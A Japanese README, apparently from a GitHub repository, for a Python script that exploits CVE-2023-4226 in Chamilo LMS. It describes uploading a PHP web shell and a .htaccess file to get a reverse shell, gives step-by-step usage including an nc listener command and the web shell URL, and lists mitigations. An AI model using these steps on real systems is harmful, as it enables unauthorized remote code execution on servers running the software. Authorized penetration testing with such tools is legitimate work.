
**Chamilo LMS** (<= v1.11.24) における無制限のファイルアップロードの脆弱性。
Chamilo LMS(<= v1.11.24)の無制限ファイルアップロード脆弱性である CVE-2023-4226 のエクスプロイトを自動化する Python スクリプト。PentesterMonkey ベースの PHP Web シェルをアップロードし、.htaccess を構成して リバースシェル を実現します。詳細: STAR Labs のアドバイザリ
/main/inc/ajax/work.ajax.php に PHP ファイルをアップロードでき、RCE に至ります。ch_sid)rce.php を IP とポートで変更します。/main/work/work.php?cidReq=HW への GET/main/inc/ajax/work.ajax.php への POST で rce.php と .htaccess をアップロード/app/cache/rce.php)Python: requests、colorama
pip install requests colorama
ファイル: rce.php(PentesterMonkey、リポジトリに同梱)、.htaccess(スクリプトが生成)
ネットワーク: リスナー用の IP とポート(例: nc -lvnp 4444)
リポジトリをクローン:
git clone https://github.com/SkyW4r33x/CVE-2023-4226
cd CVE-2023-4226
スクリプトに実行権限を付与:
chmod +x CVE-2023-4226.py
依存関係をインストール:
pip install requests colorama
別のターミナルでリスナーを起動:
nc -lvnp 4444
スクリプトを実行:
./CVE-2023-4226.py
入力するもの:
ch_sid CookieWeb シェルにアクセスしてリバースシェルを開始:
http://<chamilo>/app/cache/rce.php
例: http://chamilo.local/app/cache/rce.php
Chamilo >= v1.11.26 に更新する
ファイル名をサニタイズする
disable_dangerous_file() で HTML をブロックする
.htaccess に以下を追加:
RedirectMatch 403 ^/main/inc/lib/javascript/bigupload/files
Header set X-Content-Type-Options nosniff
許可されたテスト専用です。無許可での使用は違法です。